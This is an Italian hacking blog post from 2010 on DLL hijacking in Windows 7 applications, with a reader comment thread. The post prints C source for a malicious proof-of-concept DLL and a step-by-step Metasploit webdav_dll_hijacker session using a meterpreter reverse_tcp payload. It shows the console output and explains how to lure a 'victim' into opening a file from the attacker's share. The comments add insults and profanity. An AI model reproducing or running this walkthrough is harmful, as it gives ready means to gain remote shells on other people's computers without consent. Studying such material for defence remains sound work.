ClsHack:Computer Security Blog    

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Posted on: 25 August 2010

Questa nuova (non così nuova -.-’ ) del DLL Hijacking Exploit sta aprendo le porte a moltissimi virus.
Una immagine illustrativa di alcune applicazzioni vulnerabili:

Applicazioni che vanno incorporate di windows, a firefox e molte altre ancora.

Come funziona questa tecnica ?
(detta alla cazzo di cane merda -.-’ fuck off )
Durante la scrittura di applicazioni, si setta che il programma vada a prendersi delle funzioni contenute nelle dll (librerie).
La cosa errata è che se il programma richiama la dll “h.dll” e questa dll si trova dentro al file che viene aperto, se la PATH non è imposta il programma andrà a cercare la dll h.dll in varie destinazioni tra cui quella dove è situato il file aperto, perciò il programma, carica la falsa dll che avrà le stesse funzioni, della vera dll ma che eseguirà codice malevolo :D .
Ad esempio questo exploit per l’applicazione wap.exe di windows 7:

#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}



Si vede benissimo come il falso DllMain (una volta compilato => dll) esegua la funzione evil() => esegue calc.exe e esce :P

Sfruttando queste tecniche con metasploit, possiamo aprirci moltissime strade :D
Questa tecnica, usata con webdav :P permette anche l’esecuzione di codice remoto, come succedeva con i lnk exploit.

Vediamo come sfruttare questa vulnerabilità con metasploit e webdav :D

use windows/browser/webdav_dll_hijacker
Settiamo l’estensione della applicazione da attaccare :D
(Nel mio caso wap.exe di windows 7)
set extensions .group
set payload windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.21:4444
[*]
[*] Exploit links are now available at \\192.168.1.21\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.21:80/
[*] Server started.

Ora facciamo visitare alla vittima la nostra condivisione ;)
http://IP
oppure
\\IP
Ora la vittima dovrà aprire il file ;)
Se tutto andrà bene:

Visto che anche firefox vnc e moltissime altre applicazioni sono vulnerabili sbizzarittevi nel settare le estensioni su metasploit.

Per testare le applicazioni è stato anche rilasciato un tools:
DLLHijackAuditKit
disponibile su metasploit ;)
Mentre qui:
DOWNLOAD POC-EXPLOIT[TUTORIAL]

Related posts:

  1. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
  2. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  3. [EXPLOIT]Windows Help Centre Remote code Excution
  4. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  5. [Metasploit]Sun Java Web Start Plugin Remote Code Excution

This entry was posted on Wednesday, August 25th, 2010 at 12:22 pm and is filed under Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • fab

    Ma hai scritto con un traduttore automatico o cosa? Non si capisce niente, soprattutto la prima parte sembra proprio venire da Google Translate… Mi stupisce perché altri articoli provenienti da questo blog sono chiari e ben esposti, ma questo sembra proprio scritto con i piedi. Senza offesa, ok?

    P.S. applicaZioni si scrive con una zeta sola.

  • ilkatta

    ahaha bello il pdf… -.-’

  • clshack

    Umm ci sei ? o.O

    Questa è la scansione del pdf =>

    http://www.clshack.it/nopaste/virus.pdf

    Che merda di antivirus hai su windows o.O

  • ilkatta

    sorry avrò letto male i log di apparmon… però strano trovarsi evince nei log i ApppArmor…

  • clshack

    umm quindi tu stai dicendo che su linux hai rilevato con ApppArmor un tentativo di privilege escalation di evince…

    Potresti postare i log ? o.O

    Oppure riaprire il file, io non ho mai usato questa applicazzione e non la conosco bene… comunque è strano si, sei sicuro che non sia un falso allarme ? o.O

  • http://thissecting.wordpress.com/2010/07/20/webenum-enumerate-everything/trackback/?tb=1&url=&blog_name=& Emilio

    Alessio applicazioni con una z =)

  • clshack

    @Emilio:
    che idiota :D

    Grazie:D

    str_replace("applicazzio","applicazio",$articolo);

  • ilkatta

    non mi è ben chiaro neanche a me cmq:
    Aug 25 16:32:54 host-name kernel: [ XXX] type=1503 audit(XXXX): operation=”open” pid=XXX parent=1 profile=”/usr/bin/evince” requested_mask=”::r” denied_mask=”::r” fsuid=1000 ouid=0 name=”/usr/local/lib/liblifereafsync.so”

    cmq ho riscaricato il pdf, ora non logga più niente in AppArmor -.-’ (il pdf vecchio lo avevo “disarmato” con questo utile “scriptino”
    http://blog.didierstevens.com/programs/pdf-tools/#pdfid
    ;)

  • Pingback: [DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

  • http://www.evilripper.net evilripper

    Ma come mai sta storia è scappata fuori ora questa?

    c’e’ dalla notte dei tempi visto che è normale che gli eseguibili sotto win cercano dll anche nella loro cartella se il path non è specificato, mi sa che l’unico modo per patchare questo problema è cambiare tutti programmi e non viceversa altrimenti non vanno piu’! -_-

    ciao
    ps
    ti è scappata una frase nonsense lol:
    Guaradate le applicazioni alcune delle applicazioni infette:

  • clshack

    @evilripper:

    Si infatti ;) non basta un aggiornamento di windows per risolvere il problema…
    E grazie per la correzione :D

    @ilkatta
    Per fortuna era un falso allarme ;)

    Meglio cosi :D

  • stoke

    Il paper non è tuo (naturalmente) e ce lo dovevi scrivere, la spiegazione del bug è data male, malissimo, non hai spiegato come vedere se il software è vulnerabile o no (DLLHijackAuditKit non checka __TUTTE__ le estensioni), non hai detto dove windows va a cercare le dll (saranno posti censurati?)…

  • clshack

    @stoke:
    Il paper non è tuo (naturalmente) e ce lo dovevi scrivere...
    E di chi è se non mio ? o.O se parli del pdf, ci sono scritti dentro gli autori non copio :P
    E l’articolo l’ho scritto io :P

    E quindi non parlare per niente.

    la spiegazione del bug è data male, malissimo, non hai spiegato come vedere se il software è vulnerabile o no
    Nel pdf è spiegata bene,benissimo capirebbe anche un idiota o.O oppure te vuoi il programmi pronto che ti dice “Vulnerabile/Non vulnerabile”?
    Quindi prima di criticare gli altri guarda te stesso -.-’

    (DLLHijackAuditKit non checka __TUTTE__ le estensioni),

    Non serve DLLHijackAuditKit per testare se una applicazione, lui facilita le cose a quelli come te :P

    non hai detto dove windows va a cercare le dll (saranno posti censurati?)…

    C’è scritto tutto nel pdf !!!!

    TU SEI DA CENSURARE AAAAAAAAAA

  • Pingback: [Metasploit] multi/handler :D | Clshack

  • ilkatta

    internet è libero. Di piacere o meno.

  • clshack

    @ilkatta:

    Odio le persone che fanno supposizioni a caso :(

  • s3rg3770

    dai un occhiata a questo tool di Gianni Amato
    http://www.gianniamato.it
    per il checking delle applicazioni potenzialmente vulnerabili

  • clshack

    @s3rg3770:

    Si basa sempre su quello di HD moore, sfruttando procmon :D

    Adesso sto aspettando, l’uscita di un altro tool e poi scriverò un piccola spiegazione di come funzionano e come ricercare applicazioni vulnerabili ;)

    In tanto grazie per la segnalazione :D

  • slackover

    Ciao ragazzi sto verificando alcune applicazioni con il kit di Gianni Amato e ho notato come alcune applicazioni vulnerabili su xp non lo sono per seven e viceversa. Non ho capito se dipende dal sistema operativo o dalle applicazioni.

  • clshack

    @slackover:
    Ciao, ti consiglio di leggere anche questo articolo:

    http://www.clshack.it/tools-for-search-dll-hijacking-vulnerabilities

    Comunque, mi potresti indicare le applicazioni?

    Ma, penso proprio che si tratti della applicazione e non del sistema operativo, dipende tutto da come vengono caricate le dll nel programma.

    Anche l’ultimo aggiornamento http://support.microsoft.com/kb/2264107 non risolve il problema…

  • Stoke

    Io faccio supposizioni alla cazzo?

    Bene, perchè hai censurato la mia ultima risposta?

    Bah… perchè io quando faccio un tutorial mi spreco di far capire alla gente ciò che accade?

    Tanto basta usare metasploit SUPER EXTRA PWNANTI551M0 come lui.

  • clshack

    @Stoke:

    Bene, perchè hai censurato la mia ultima risposta?

    Nessuna tua risposta è stata censurata anzi aspettavo rispondessi :P

    Bah… perchè io quando faccio un tutorial mi spreco di far capire alla gente ciò che accade?

    E’ una domanda ? o.o si io cerco nelle mie possibilità di far capire…e dopo allego i documenti originali che da li si capisce sicuramente meglio

    Tanto basta usare metasploit SUPER EXTRA PWNANTI551M0 come lui.

    Vuoi un applauso o.o

  • Pier

    L’autore è anche un pezzo di merda. Non cliccate quì “Download POC-EXPLOIT TUTORIAL”

  • clshack

    @pier:
    ahaha ma dai